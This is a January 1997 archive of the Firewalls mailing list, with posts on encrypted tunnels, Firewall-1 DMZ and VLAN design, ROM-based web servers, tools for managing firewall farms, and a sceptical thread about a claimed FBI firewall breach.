If I have source and destination IP's defined, does it really make that much difference? Thanks, Dave Wreski ----------------------------------------------------------------------- "The opinions expressed here are my own and do not represent the views or opinions of United Parcel Service, Inc." ----------------------------------------------------------------------- echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc From firewalls-owner Fri Jan 10 13:09:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA02358 for firewalls-outgoing; Fri, 10 Jan 1997 11:31:27 -0800 (PST) Received: from mule1.mindspring.com (mule1.mindspring.com [204.180.128.167]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA02334 for ; Fri, 10 Jan 1997 11:31:13 -0800 (PST) Received: from MENTOR.dssny.com ([38.216.37.12]) by mule1.mindspring.com (8.8.4/8.8.4) with SMTP id OAA20568 for ; Fri, 10 Jan 1997 14:30:25 -0500 Message-Id: <3.0.32.19970110143008.006fceec@pop.pipeline.com> X-Sender: bbrent@pop.pipeline.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 10 Jan 1997 14:30:19 -0500 To: Firewalls@GreatCircle.COM From: "William A.Brent" , bbrent@pipeline.com Subject: Outlink updates 'The Firewall Report Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk had this come across the wire today, thought it might be of interest (though just a bit pricey) *** Outlink updates 'The Firewall Report' Outlink, Inc., an information technology market research firm, has updated "The Firewall Report" publication. Outlink is now selling the report with profiles of Trusted Information System's Gauntlet 3.2, Secure Computing's Sidewinder 3.0, Secure Computing's BorderWare Firewall Server 4.0 and Milkyway Networks' Black Hole 3.0 version. Outlink's research profiles 20 leading firewall solutions and suppliers. 
Priced at $995, "The Firewall Report" contains profiles of 20 leading products and their suppliers. Each profile is approximately 60 to 80 pages in length with detailed research.

bb
.,-*'`^`'*-,.__.,-*'`^`'*-,.__.,-*'`^`'*-,.__.,-*'`^`'*-,._
--==[> All spelling errors due to line noise <]==--
--==[> E-Mail me at bill@dssny.com <]==--
_.,-*'`^`'*-,.__.,-*'`^`'*-,.__.,-*'`^`'*-,.__.,-*'`^`'*-,._

From firewalls-owner Fri Jan 10 13:15:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA03701 for firewalls-outgoing; Fri, 10 Jan 1997 11:51:54 -0800 (PST) Received: from sonda.cl (mail.sonda.cl [200.6.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA03680 for ; Fri, 10 Jan 1997 11:51:43 -0800 (PST) Received: by guardia.sonda.cl id <24204>; Fri, 10 Jan 1997 16:54:30 -0300 Posted-Date: Fri, 10 Jan 1997 16:49:01 -0300 Date: Fri, 10 Jan 1997 10:50:23 -0300 Message-Id: <97Jan10.165430cdt.24204@guardia.sonda.cl> From: m_fliguer@sonda.cl (Miguel Fliguer - Troppus Erawtfos) To: firewalls@GreatCircle.COM Subject: Re: TCP/IP encrypted connection X-VMS-To: SMTP%"firewalls@greatcircle.com" X-VMS-Cc: M_FLIGUER Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

You wrote :
>>>I'm looking for a good way to transfer TCP/IP data between two Networks
>>>(two countries) safe and secure over the Internet. Maybe a router which
>>>is capable of encrypting outgoing packets addressed to certain networks?
>>>Any ideas would be appreciated.
>>>Thanks and best regards, a reply would be greatly appreciated.

I'd suggest joining DEC's Altavista Visionary Club (it's free, and you can download all the betas and evaluation copies).
It's at : http://204.123.2.99/cgi-bin/download.cgi

You will find (among many other interesting betas) :
Altavista Tunnel (Personal Edition) (for W95 & WNT)
Altavista Tunnel (Workgroup Edition) (for many architectures)
Altavista Tunnel Guide (postscript)

This stuff will let you encrypt TCP/IP packets and then encapsulate them to be transmitted. The software establishes a "tunnel" between a (for example) PC on the Internet, and a server on an Intranet, using "pseudoadapters" within a restricted IP address range. Get the guide and print it, you will get the complete picture.

Regards, Miguel Fliguer SONDA Computacion Buenos Aires, Argentina

From firewalls-owner Fri Jan 10 13:44:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA03470 for firewalls-outgoing; Fri, 10 Jan 1997 11:49:20 -0800 (PST) Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA03463 for ; Fri, 10 Jan 1997 11:49:09 -0800 (PST) Received: from sdfpc2.gsfc.nasa.gov by csc.com with smtp (Smail3.1.29.1 #1) id m0vimwA-001ArAC; Fri, 10 Jan 97 14:48 EST Message-ID: <32D6C593.554C@csc.com> Date: Fri, 10 Jan 1997 14:41:23 -0800 From: Adam Safier Reply-To: asafier@csc.com Organization: Computer Sciences Corp. X-Mailer: Mozilla 3.0 (Win16; U) MIME-Version: 1.0 To: palan@dataprep.com.my, Firewalls@GreatCircle.COM Subject: VLAN OVER FW-1 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> ... can checkpoint fw-1 have a full
> control over a certain VLANs ?

I doubt it. What do you mean by "full control"? It won't configure the VLAN or filter by MAC address. It has control of IP packets sent to the firewall interface. No firewall controls traffic that is not passing through it. (You could theoretically cause interference on the subnet but no one I know does it.)
>                 10mb +------+ 155mb
> INTERNET ---------| SUN |-----------INTERNAL NETWORK
>                   | FW-1 |
>                   +---+--+
>                       |
>                       |
>                       | 10mb
>                       |
>                       |
>                     VLAN
>
> the machines that grouped in these particular VLAN is scattered around the
> building. i need some advice on how effective is this setup and does anyone
> implemented such a design ?

This is a common Firewall-1 configuration. The DMZ is a separate IP subnet. If you are using a VLAN to separate your IP subnets you run the risk that the system admin might accidentally reconfigure the VLAN to allow the DMZ nodes to be visible from the other net. The diagram you have is a logical diagram while I assume your actual physical diagram would have a line running from the VLAN to the Internal network (forming a physical triangle to a backbone of VLANs). Since they are separate IP subnets the systems might not talk to each other directly if the VLAN is reconfigured or bridged to other VLANs. But anyone who bothered checking ARP tables, ran a sniffer or simply misconfigured his machine to a much bigger mask or wrong IP subnet could see your DMZ systems.

So - weigh how well you trust the VLAN configuration system, VLAN logic and your VLAN admin vs. the cost of running a separate physical LAN for the sensitive nodes vs. relocating the sensitive machines into one secure computer room (They are physically secure, right?)

If you must use the VLAN you might also consider running the DMZ interface as 802.3 while the Internal LAN is DIX ethernet (or vice versa.) I haven't tried this (yet) but it should add an additional layer of protection in case the VLAN is misconfigured. The Sniffer would have to be listening to both DIX and 802.3 and looking outside the correct local IP subnet. I've gotten warnings about the combination of 802.3 and NAT not working well in FW-1 2.1 so watch out for that combo (NAT's fine with DIX ethernet). I'm not sure if it's supposed to be fixed in 3.0, which I'm looking forward to.
Good luck, Adam
--
Adam Safier asafier@csc.com http://www.csc.com CSC-SED-Infosec (301) 794-1349 (301) 552-3272 (fax)
Technology Abuse: 1) Netscape Frames on a 14" screen. 2) Netscape 3.0 on a 386-33 w/ 8 Meg RAM.
The above are my own opinions. I'm proud to live in a country where I'm free to express them!

From firewalls-owner Fri Jan 10 13:51:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06839 for firewalls-outgoing; Fri, 10 Jan 1997 12:34:42 -0800 (PST) Received: from grtk (grtk.com [204.227.12.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06781 for ; Fri, 10 Jan 1997 12:34:20 -0800 (PST) Received: from Fortress.grtk.com ([150.1.10.54]) by grtk (8.6.9/8.6.9) with SMTP id PAA10589 for ; Fri, 10 Jan 1997 15:47:32 -0500 Message-Id: <1.5.4.32.19970110203635.006a5348@grtk.com> X-Sender: jcross@grtk.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 10 Jan 1997 15:36:35 -0500 To: firewalls@GreatCircle.COM From: John Cross Subject: Newbie Q's & Class 3 Firewalls? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I'm currently trying to find a replacement for our TIS firewall running on a BSD box. I've asked for product info on the following:
Guardian
OnGuard
CheckPoint
Eagle NT

I'm planning on running the system on an NT pentium box. Couple of questions:

1. I've had a couple of those sales types banter around the term 'Class 3' firewall, what are they talking about? I think Class 1 is just packet filtering, Class 2 is proxy service, but don't quite understand Class 3.

2. I'm looking for transparency for my uneducated users. They are having a hard enough time understanding ftp, much less having to hit a firewall and then bounce off of there to the site they're trying to reach. Does anyone have suggestions/comments on any products for this?
(okay, I confess, I also want to be able to play Diablo, IRC, etc through the firewall and TIS isn't letting me)

3. Does the webserver belong in the DMZ? I've noticed in a lot of the reading that the webserver is usually stuck outside the firewall, why is this? Is it the sacrificial lamb or does it just pose too many problems bringing it on the inside? Any tips for securing it if it's stuck out in the DMZ? Most importantly, can the Webserver run on the same box as the firewall or is this a bad idea?

==========================================================================
System Administration | POWER
Rambling Wreck from GA.TECH | maMtItNeDr
Pi Kappa Phi, Iota 1095 | Look to the future, it's all we have left
==========================================================================

From firewalls-owner Fri Jan 10 15:30:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA12596 for firewalls-outgoing; Fri, 10 Jan 1997 13:19:37 -0800 (PST) Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.32.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA12518 for ; Fri, 10 Jan 1997 13:19:09 -0800 (PST) Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id NAA29747; Fri, 10 Jan 1997 13:18:33 -0800 (PST) Date: Fri, 10 Jan 1997 13:18:32 -0800 (PST) From: Sameer R Manek To: Alexey Zilber cc: firewalls@GreatCircle.COM Subject: Re: Rom based os/web server? In-Reply-To: <2.2.32.19970109161037.00bf5620@icarus.usanetworks.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

True, a ROM-based OS is a nice thing, but can you ever change configuration files? upgrade the kernel? or what about security patches?
All these will require a new card or ROM upgrade from the vendor unless they give you some way to do it, possibly a flash ROM, in which case someone could hack the box and possibly remotely burn a backdoor.

IMHO a better way to do things is have the webserver NFS mount the files from another box, which exports them read only. Then have the NFS server locked down; even if they penetrate your web server the files are intact, which means one less thing you have to do for damage control.

Sameer
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sameer Manek manek@challenger.atc.fhda.edu
"A mind once stretched by a new idea never regains its original dimensions"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

On Thu, 9 Jan 1997, Alexey Zilber wrote:
> I received the previous month's copy of The Linux Journal (yes, yes, I know..
> :-) ). And it talks about a ROM-based stripped down version of Linux that's
> been created, for systems that cannot use components that could be damaged
> from stress (like hard drives). This thing is stored, compressed in ROM, then
> gets booted and uncompressed into RAM.
> This thing might be good for a hard-coded webserver. While it could
> get hacked, a reboot and a password change should be all that's needed to
> repair it.
> Alex > > From firewalls-owner Fri Jan 10 15:33:08 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19946 for firewalls-outgoing; Fri, 10 Jan 1997 14:03:48 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA19764 for ; Fri, 10 Jan 1997 14:03:11 -0800 (PST) From: Patrick_Scannell@mail.fws.gov Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA06177; Fri, 10 Jan 1997 14:01:52 -0800 Received: from dns.irm.r9.fws.gov(164.159.176.1) by mycroft via smap (V1.3mjr) id sma006124; Fri Jan 10 14:00:43 1997 Received: from mail.fws.gov by dns (SMI-8.6/SMI-4.1) id PAA24020; Fri, 10 Jan 1997 15:05:48 -0700 Received: from ccMail by mail.fws.gov (SMTPLINK V2.11 PreRelease 4) id AA852937371; Fri, 10 Jan 97 12:54:59 MST Date: Fri, 10 Jan 97 12:54:59 MST Message-Id: <9700108529.AA852937371@mail.fws.gov> To: firewalls@GreatCircle.COM Subject: cc:Mail through a FireWall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please share your experience routing cc:Mail through a firewall. For instance, what port does it use? Thanks, Patrick From firewalls-owner Fri Jan 10 15:35:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA13179 for firewalls-outgoing; Fri, 10 Jan 1997 13:25:01 -0800 (PST) Received: from shell.flinet.com (shell.flinet.com [205.216.85.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA13127 for ; Fri, 10 Jan 1997 13:24:45 -0800 (PST) Received: (from scott@localhost) by shell.flinet.com (8.8.4/8.8.3) id QAA05132; Fri, 10 Jan 1997 16:24:28 -0500 (EST) Date: Fri, 10 Jan 1997 16:24:27 -0500 (EST) From: Scott Averbach To: Alexey Zilber cc: firewalls@GreatCircle.COM Subject: Re: Rom based os/web server? 
In-Reply-To: <2.2.32.19970109161037.00bf5620@icarus.usanetworks.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Well I see at least two things wrong with this....

1) The same software that would code the "WEB SITE" into the ROM could be reproduced to code other stuff such as a backdoor....

2) A machine like this would cost far more than it would to adequately secure and backup a normal Linux machine... Whole Linux OS in ROM seems like a lot....then put it into RAM.... that's a large amount of cash... put it on its own segment with a firewall and secure it and you have a versatile machine for a lot less money!

---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\---
-/- Scott Averbach -\- Florida Internet Corporation -/-
-\- Senior Systems Administrator -/- We are - Voice: 561.615.0001 -\-
-/- mail:scott@flinet.com -\- the most - Fax: 561.615.0002 -/-
-\- http://www.flinet.com -/- highly rated ISP in Florida! -\-
---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\---
---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\---
-/- The truth is out there -\- C Code, C Code Run, Run -/-
-\- anyone know the URL? -/- Code, RUN! PLEASE!!! -\-
---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\---

On Thu, 9 Jan 1997, Alexey Zilber wrote:
> I received the previous month's copy of The Linux Journal (yes, yes, I know..
> :-) ). And it talks about a ROM-based stripped down version of Linux that's
> been created, for systems that cannot use components that could be damaged
> from stress (like hard drives). This thing is stored, compressed in ROM, then
> gets booted and uncompressed into RAM.
> This thing might be good for a hard-coded webserver. While it could
> get hacked, a reboot and a password change should be all that's needed to
> repair it.
> Alex
>
>

From firewalls-owner Fri Jan 10 15:40:21 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA21746 for firewalls-outgoing; Fri, 10 Jan 1997 14:10:57 -0800 (PST) Received: from usanetworks.com (icarus.usanetworks.com [204.178.38.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA21689 for ; Fri, 10 Jan 1997 14:10:36 -0800 (PST) Received: from koguma (alpha.usanetworks.com) by usanetworks.com (5.x/SMI-SVR4) id AA24306; Fri, 10 Jan 1997 17:13:16 -0500 Message-Id: <2.2.32.19970110220756.00aadd84@icarus.usanetworks.com> X-Sender: alex@icarus.usanetworks.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 10 Jan 1997 17:07:56 -0500 To: Scott Averbach From: Alexey Zilber Subject: Re: Rom based os/web server? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 04:24 PM 1/10/97 -0500, you wrote:
>Well I see at least two things wrong with this....
>
>1) The same software that would code the "WEB SITE" into the ROM could be
>reproduced to code other stuff such as a backdoor....
>

Not possible, the burner is external. This is the same way many routers are setup, with the firmware being in the ROM. To upgrade, you get new chips.

>2) A machine like this would cost far more than it would to adequately
>secure and backup a normal Linux machine... Whole Linux OS in ROM seems
>like a lot....then put it into RAM.... that's a large amount of cash...
>put it on its own segment with a firewall and secure it and you have a
>versatile machine for a lot less money!

Now I'm not so sure. A stripped down version of Linux with a webserver would not take up that much. Anyway, such a setup would be great for a webserver in a rough environment. BUT, many IDE (and I'm sure SCSI) drives have a Read Only jumper on the actual HD. Think of the many uses...
>
>
>
> ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\---
> -/- Scott Averbach -\- Florida Internet Corporation -/-
> -\- Senior Systems Administrator -/- We are - Voice: 561.615.0001 -\-
> -/- mail:scott@flinet.com -\- the most - Fax: 561.615.0002 -/-
> -\- http://www.flinet.com -/- highly rated ISP in Florida! -\-
> ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\---
>
> ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\---
> -/- The truth is out there -\- C Code, C Code Run, Run -/-
> -\- anyone know the URL? -/- Code, RUN! PLEASE!!! -\-
> ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\---
>
>On Thu, 9 Jan 1997, Alexey Zilber wrote:
>
>> I received the previous month's copy of The Linux Journal (yes, yes, I know..
>> :-) ). And it talks about a ROM-based stripped down version of Linux that's
>> been created, for systems that cannot use components that could be damaged
>> from stress (like hard drives). This thing is stored, compressed in ROM, then
>> gets booted and uncompressed into RAM.
>> This thing might be good for a hard-coded webserver. While it could
>> get hacked, a reboot and a password change should be all that's needed to
>> repair it.
>> Alex
>>
>>
>>
>
Alex

From firewalls-owner Fri Jan 10 15:42:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA24343 for firewalls-outgoing; Fri, 10 Jan 1997 14:24:11 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA24336 for ; Fri, 10 Jan 1997 14:24:03 -0800 (PST) Received: by hidata.com; id AA13076; Fri, 10 Jan 97 14:23:50 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma013074; Fri, 10 Jan 97 14:23:30 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFF01.BA80BD30@oscntsrv.hidata.com>; Fri, 10 Jan 1997 14:22:37 -0800 Message-Id: From: "Stout, Bill" To: "'Firewall List'" Subject: FW-Farm management Application Date: Fri, 10 Jan 1997 14:22:36 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I dropped out of the list for a few days, and expected to see some general discussion on the list about managing FW-farms. However the replies I received are only from v_large corporations and governmental agency users. Seems most companies and vendors are not ready to take on FW-farm management issues yet, though users are. This is an indication of a 'small but present' market segment. Firewall sales usually are very small quantities per company, and very few companies who have firewalls have farms, and just a few of those farms have a current want for a FW-farm Management application. The list is too long, and for multi-platform management capability would require some SSL'd multivendor network API.
The development would be expensive, but for some v_large_J companies with long-term vision, not too expensive if the technology developed were reusable. (I speak only for myself).

Anyway here are a few additions to the list, and the original list:

Additional suggestions:
A. VPN Management capability
B. Traffic Statistics per-proxy
C. Multi-protocol management (Internal-internal)

Original List:
1. An initial GUI which allows an administrator to view multiple gateways, ports, alert status, and proxy states.
2. The ability to select a proxy and view configuration information on that proxy on a specific gateway.
3. The ability to delegate departmental security.
4. The ability to manage individual user authentication per proxy.
5. The ability to centrally view logs.
6. The ability to send pages on specific events.
7. If located on the same DMZ subnet as the gateways, the ability to sniff packets and graphically organize them, other basic network management monitoring.
8. A sanity-check utility which looks for obvious proxy filter configuration errors.
9. A tripwire utility to display alerts on file and process state changes.
10. 'Courtney' for farms?
11. Instant traceback utility to collect suspicious host information (DNS data, traceroute, whois, traffic type, etc).
12. Time synchronization verification for accurate log comparisons.
13. Strongly encrypted and authenticated administrative channels.
14. Load balancing?

Bill Stout Sr.
Systems Admin Hitachi Data Systems

From firewalls-owner Fri Jan 10 15:59:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA26778 for firewalls-outgoing; Fri, 10 Jan 1997 14:52:03 -0800 (PST) Received: from safety.worldcom.com (safety.worldcom.com [198.64.193.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA26761 for ; Fri, 10 Jan 1997 14:51:45 -0800 (PST) Received: (from smtp@localhost) by safety.worldcom.com (8.7.1/8.6.9) id QAA08802 for ; Fri, 10 Jan 1997 16:36:41 -0600 (CST) Received: from worldcom-47.worldcom.com(198.64.193.159) by safety.worldcom.com via smap (V1.3) id sma008792; Fri Jan 10 16:36:37 1997 Received: by worldcom-47.worldcom.com (IBM OS/2 SENDMAIL VERSION 1.3.14/3.3) id AA0336; Fri, 10 Jan 97 16:36:23 -0800 Message-Id: <9701110036.AA0336@worldcom-47.worldcom.com> Received: from WorldCom with "Lotus Notes Mail Gateway for SMTP" id E7FC618DEE6A9B968625641B007C1AC7; Fri, 10 Jan 97 16:36:22 To: firewalls From: Anthony Commarata Date: 10 Jan 97 16:53:51 EDT Subject: Re: TCP/IP encrypted connection Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I highly recommend NetCrypto; NetCrypto (McAfee) for Windows works with the existing TCP/IP stack, i.e. WRQ Reflections. This is accomplished by operating on the Windows DLL level, ensuring that each session between each workstation is encrypted; from the user's perspective it's transparent. NetCrypto has a few options for encryption level, DES, Triple-DES and PC1. However if used overseas you would have to use the 40 bit PC1 encryption to comply with the US government's ITAR regulations which control the export of encryption software.
Complete Network Security and Privacy

NetCrypto Protects Your Data from Prying Eyes

Consider the information being sent over your network: confidential company data, electronic mail, proprietary output, not to mention your name and password every time you connect to a remote server. All of this information is sent over your network, or over the Internet, in plain clear text that can be easily intercepted, examined or modified by anyone else on the network. Not any more. With NetCrypto, all of your network sessions, including telnet, ftp, SQL, WWW, email and so on, are transparently encrypted with industry-standard strong encryption algorithms. Only you and the program you're interacting with on the remote server can see the decrypted information. Anyone else sees nothing but random gobbledygook.

Transparent Protection

NetCrypto transparently protects all TCP/IP network traffic as it travels between UNIX, Windows, and Macintosh computers. It intercepts data coming from an application, and applies strong encryption before permitting them onto your network. On the destination computer, NetCrypto transparently decrypts the communications before passing them up to the receiving application. Using an open-architecture security manager, NetCrypto employs a variety of security technologies to prevent snoopers from gathering user names, passwords, transaction information, and other sensitive data as they pass from one computer to another across your networks or the Internet. NetCrypto supports Windows, UNIX and Macintosh systems with TCP/IP networking.

Easy to Install, Maintain, and Use

NetCrypto is easy to install, maintain, and use. On Windows and Macintosh systems, no application or system modifications are required, eliminating two major impediments to implementing secure networking. No user training is required, since all encryption activities are transparent to the end user.
Full compatibility with a non-NetCrypto machine is maintained, making NetCrypto roll-out a snap, even for large sites.

Open Architecture to Support Standards

To cope with the wide range of emerging encryption standards, NetCrypto provides an open-architecture encryption manager into which new software modules for encryption, authentication, and filtering can be plugged. McAfee is committed to working both independently and with other interested third parties to support emerging standards.

NetCrypto Benefits

By using NetCrypto, a company protects itself from the growing number of network-based attacks that result in downtime, leaked sensitive data, tampering, and other costly security breaches. Complementary security solutions such as firewalls and encrypting routers protect data from one site boundary to another, but NetCrypto provides true end-to-end protection. This makes NetCrypto particularly well suited not only to Internet remote access situations, but also to intranet applications within the enterprise.

Ubiquitous Secure Computing

NetCrypto provides straightforward, transparent, strong network security, with an open architecture that handles emerging security standards, and that maintains full compatibility with non NetCrypto equipped machines. NetCrypto is the first product to reflect both the growing need for integrated security and the need for an open architecture upon which to base it. NetCrypto provides the link between the existing world of unprotected networked communications and the new world of ubiquitous secure networking.

Features and Benefits

Encrypts All TCP/IP Traffic
Encrypting all network traffic ensures that any communication you have over your network is private and secure from eavesdropping. Whether you're sending email, transferring files, or browsing the web, all information across the network remains confidential.
Because the traffic is encrypted at a system level, separate packages are not required for different types of TCP communication. NetCrypto encrypts all TCP traffic, including telnet, rlogin, email, WWW, SQL, ftp, and so on.

Software Solution

No expensive hardware to purchase and install. The software is easily distributed across an entire network, making roll-out a snap.

No System or Application Modifications

Promotes compatibility with future operating system upgrades and modifications. This also helps to prevent any conflicts with existing software that may require an unmodified operating system. Since applications can be used without modifications in most cases, NetCrypto can be put to use immediately with your existing code.

Negligible Network Overhead

This means that NetCrypto will not slow your network down. Programs that use lots of network bandwidth can often slow your network down, especially on computers with slower processors. This does not happen with NetCrypto.

System drop-in on Windows and Macintosh

The Windows and Macintosh versions of NetCrypto are 'set-and-forget' systems that are transparent to the user. This means that users can continue to use whatever programs they have been using for email, telnet, ftp, etc. No training or relearning is required.

Available on Many Systems

Since NetCrypto operates on most UNIX platforms, Macintosh systems, and Windows 3.x, 95 and NT, you can be confident that all your systems will be protected.

Requires No Key Management

This greatly simplifies the administration of NetCrypto. No external key management server is required. Key management can be added in the future for authentication purposes, but it is not required.

Small Binary File

Makes for easy network- or disk-based distribution.
Multiple Encryption Algorithms

Uses industry-standard encryption that meets most security requirements
Supports DES, Triple DES, PC1 and Blowfish

Open Architecture

NetCrypto supports plug-in software modules from a variety of vendors, ensuring compatibility with future security technologies.

Compatible with Non-Encrypted Systems

NetCrypto is completely compatible with non-encrypted TCP/IP systems. When NetCrypto encounters a non-NetCrypto system at the other end of a network connection, it can, at your option, either connect in a standard non-encrypted fashion, or refuse the connection.

Expandable Features

NetCrypto currently encrypts all TCP network traffic, and down the road, you'll be able to add features such as authentication and filtering to the NetCrypto system, expanding it to fit your present and future needs.

Anthony J. Commarata, CNE
Sr. Network Engineer
Jones, Day, Reavis & Pogue

From firewalls-owner Fri Jan 10 16:17:23 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA27192 for firewalls-outgoing; Fri, 10 Jan 1997 14:59:06 -0800 (PST)
Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA27170 for ; Fri, 10 Jan 1997 14:58:57 -0800 (PST)
Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id QAA26255; Fri, 10 Jan 1997 16:47:41 -0500
Date: Fri, 10 Jan 1997 16:47:37 -0500 (EST)
From: Rabid Wombat
To: Gabriel Dura
cc: mike , firewalls@GreatCircle.COM
Subject: Re: FW-1 hacked? - Reply
In-Reply-To: <199701101620.IAA19160@geocities.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I could, if I were so inclined, tell you the names of many systems that are behind many types of firewalls.
That does not mean that I got through the firewall to get that information - I may have worked on the system, the name of a system could have been included in a legitimate transmission, etc. Simply naming a system (especially when the existence of said system hasn't been verified) isn't "proof" in my book.

I have worked on systems at govt. sites that are behind FW-1. I know the names of many of these systems. I could probably guess the names of others, just by following the naming conventions. This could be offered as "proof" that the firewall was compromised, even though it was not.

My b.s. detector is going off.

-r.w.

On Fri, 10 Jan 1997, Gabriel Dura wrote:

>
> There is a guy, working on his own, who claims he knows how to penetrate
> FBI's firewall.
> As a proof I was told that behind the firewall there is another
> computer 'phi.fbi.gov'.
>
>
> In the case of me being correctly informed and FBI is using FW-1 you have
> an answer.
>
>
> Hope it helps,
> Gabriel Dura
> dura@geocities.com
>
>
> P.S. I can not guarantee the accuracy of this information and I can not
> reveal the person who told me.
>
>
>
> ----------
> > From: mike
> > To: firewalls@GreatCircle.COM
> > Subject: FW-1 hacked?
> > Date: Wednesday, January 08, 1997 16:27
> >
> >
> > Hi all
> > Does anyone know if FW-1 was ever hacked?
> >

From firewalls-owner Fri Jan 10 16:40:20 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA27645 for firewalls-outgoing; Fri, 10 Jan 1997 15:04:58 -0800 (PST)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA27617 for ; Fri, 10 Jan 1997 15:04:47 -0800 (PST)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id PAA27889 for ; Fri, 10 Jan 1997 15:06:52 -0800 (PST)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA10054; Fri, 10 Jan 97 15:04:33 PST
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id PAA06694 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Fri, 10 Jan 1997 15:04:25 -0800 (PST)
Message-Id: <199701102304.PAA06694@notesgw2.sybase.com>
